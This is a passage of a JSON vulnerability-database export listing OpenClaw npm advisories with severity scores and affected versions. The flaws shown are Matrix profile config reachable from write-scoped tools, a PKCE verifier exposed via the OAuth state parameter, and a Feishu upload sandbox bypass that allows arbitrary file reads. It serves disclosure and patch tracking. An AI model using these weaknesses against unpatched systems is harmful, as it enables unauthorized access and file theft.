                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-fqrj-m88p-qf3v"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q9jf-srt4-fbcg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90075?format=api",
            "vulnerability_id": "VCID-qedr-a3ay-v3gx",
            "summary": "OpenClaw: Matrix profile config persistence was reachable from operator.write message tools\n## Summary\n\nMatrix profile config persistence was reachable from operator.write message tools.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nGateway `operator.write` message-tool paths could reach Matrix profile persistence that should have required admin-level authority.\n\n## Technical Details\n\nThe fix gates Matrix profile updates for non-owner message-tool runs and prevents write-scoped callers from mutating persistent profile config.\n\n## Fix\n\nThe issue was fixed in #62662. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fe0f686c9228fffcec6de4011da45e69a6e23e54`\n- PR: #62662\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42433",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08411",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09776",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09802",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42433"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/62662",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/62662"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42433",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42433"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-matrix-profile-config-persistence-access-via-operator-write-message-tools"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7jp6-r74r-995q",
                    "reference_id": "GHSA-7jp6-r74r-995q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7jp6-r74r-995q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-42433",
                "GHSA-7jp6-r74r-995q"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qedr-a3ay-v3gx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89434?format=api",
            "vulnerability_id": "VCID-qjss-tvgk-3ubk",
            "summary": "Duplicate Advisory: OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9jpj-g8vv-j5mf. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.4.2 reuses the PKCE verifier as the OAuth state parameter in the Gemini OAuth flow, exposing it through the redirect URL. Attackers who capture the redirect URL can obtain both the authorization code and PKCE verifier, defeating PKCE protection and enabling token redemption.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-ch86-pxr9-j9h9",
                    "reference_id": "GHSA-ch86-pxr9-j9h9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-ch86-pxr9-j9h9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "GHSA-ch86-pxr9-j9h9"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qjss-tvgk-3ubk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91256?format=api",
            "vulnerability_id": "VCID-qjvc-etb4-qbfv",
            "summary": "OpenClaw: Feishu extension resolveUploadInput bypasses file-system sandbox and allows arbitrary file reads via upload_image\n## Summary\n\nFeishu upload path resolution could read files outside the configured localRoots sandbox before handing them to the upload path.\n\n## Impact\n\nA tool caller constrained to workspace or localRoots paths could exfiltrate arbitrary host files through Feishu upload actions.\n\n## Affected Component\n\n`extensions/feishu/src/docx.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.6, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `764394c78b` (`fix: enforce localRoots sandbox on Feishu docx upload file reads`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41363",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18387",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18424",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18421",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41363"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41363",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
